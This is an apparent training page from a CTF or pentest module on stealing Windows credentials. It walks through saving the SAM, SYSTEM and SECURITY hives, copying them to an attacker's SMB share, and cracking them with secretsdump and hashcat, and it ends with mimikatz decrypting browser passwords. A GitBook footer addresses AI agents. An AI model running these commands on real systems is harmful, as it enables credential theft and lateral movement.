> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-authentication-process/attacking-sam-system-and-security.md).

# Attacking SAM, SYSTEM, and SECURITY

#### What this section is about

You have admin access to a Windows machine. You want to extract all local user password hashes so you can crack them offline. This section covers exactly how to do that — locally and remotely.

***

#### The 3 Registry Hives you need

Think of these as three files you need to steal:

| Hive            | What's inside                                | Why you need it                                  |
| --------------- | -------------------------------------------- | ------------------------------------------------ |
| `HKLM\SAM`      | Local user password hashes                   | The actual hashes you want to crack              |
| `HKLM\SYSTEM`   | The boot key                                 | Needed to decrypt the SAM — useless without this |
| `HKLM\SECURITY` | Cached domain creds, DPAPI keys, LSA secrets | Bonus — domain user hashes cached locally        |

You need both SAM and SYSTEM together — SAM alone is encrypted and useless without the boot key from SYSTEM.

***

#### Method 1 — Local dumping (you're on the machine)

**Step 1 — Save the registry hives**

```cmd
reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save
```

This creates copies of all three hives as files on disk.

**Step 2 — Transfer to your attack machine**

Set up an SMB share on your Kali:

```bash
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/user/Documents/
```

Then from the Windows target, move the files to your share:

```cmd
move sam.save \\<your-IP>\CompData
move security.save \\<your-IP>\CompData
move system.save \\<your-IP>\CompData
```

`-smb2support` is important — modern Windows has SMBv1 disabled, without this flag the transfer fails.

**Step 3 — Dump hashes with secretsdump**

```bash
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
```

Output format:

```
username:RID:LMhash:NThash:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
```

* **RID** — user ID (500 = Administrator, 501 = Guest)
* **LM hash** — old, weak, mostly empty (`aad3b435...` = blank LM hash)
* **NT hash** — what you actually crack — the last part before `:::`

secretsdump first extracts the boot key from SYSTEM, uses it to decrypt SAM, then dumps the hashes.

**Step 4 — Crack NT hashes with hashcat**

```bash
# Put NT hashes in a file
vim hashestocrack.txt

# Crack — mode 1000 = NTLM/NT hashes
hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt
```

***

#### Method 2 — Remote dumping (from your attack machine)

If you already have valid admin credentials, you don't even need to be on the machine.

```bash
# Dump SAM remotely
netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam

# Dump LSA secrets remotely
netexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
```

`--local-auth` = use local account, not domain account. Important on non-domain machines.

***

#### DCC2 hashes — the harder ones

When secretsdump dumps `HKLM\SECURITY` it also grabs cached domain credentials in DCC2 format:

```
inlanefreight.local/Administrator:$DCC2$10240#administrator#23d97555...
```

These are hashes of domain user passwords cached locally so you can still log in when the DC is unreachable.

Key differences from NT hashes:

|               | NT Hash           | DCC2 Hash                 |
| ------------- | ----------------- | ------------------------- |
| Speed         | \~4.6 million/sec | \~5,500/sec — 800x slower |
| Pass-the-Hash | Yes               | No                        |
| Hashcat mode  | `1000`            | `2100`                    |

```bash
hashcat -m 2100 '$DCC2$10240#administrator#23d97555...' /usr/share/wordlists/rockyou.txt
```

Because they're so slow to crack, strong DCC2 passwords are often uncrackable in a real engagement timeframe.

***

#### DPAPI — bonus credential goldmine

DPAPI keys are also dumped from `HKLM\SECURITY`. DPAPI is what Windows uses to encrypt saved passwords in:

* Chrome/Edge saved passwords
* Outlook email passwords
* Saved RDP credentials
* Credential Manager entries
* WiFi passwords

Once you have the DPAPI keys from secretsdump, you can decrypt all of these:

```cmd
# Decrypt Chrome saved passwords with mimikatz
mimikatz # dpapi::chrome /in:"C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
```

Output gives you plaintext URLs, usernames and passwords saved in the browser.

***

#### Full attack flow summary

```
Admin access on Windows machine
    ↓
reg.exe save → 3 hive files (SAM, SYSTEM, SECURITY)
    ↓
smbserver.py → create share on Kali
    ↓
move files to share
    ↓
secretsdump.py → extract NT hashes + DCC2 + DPAPI keys
    ↓
hashcat -m 1000 → crack NT hashes
hashcat -m 2100 → crack DCC2 (if needed)
mimikatz/dpapi → decrypt DPAPI blobs
    ↓
Cracked passwords → lateral movement, credential stuffing
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/windows-authentication-process/attacking-sam-system-and-security.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
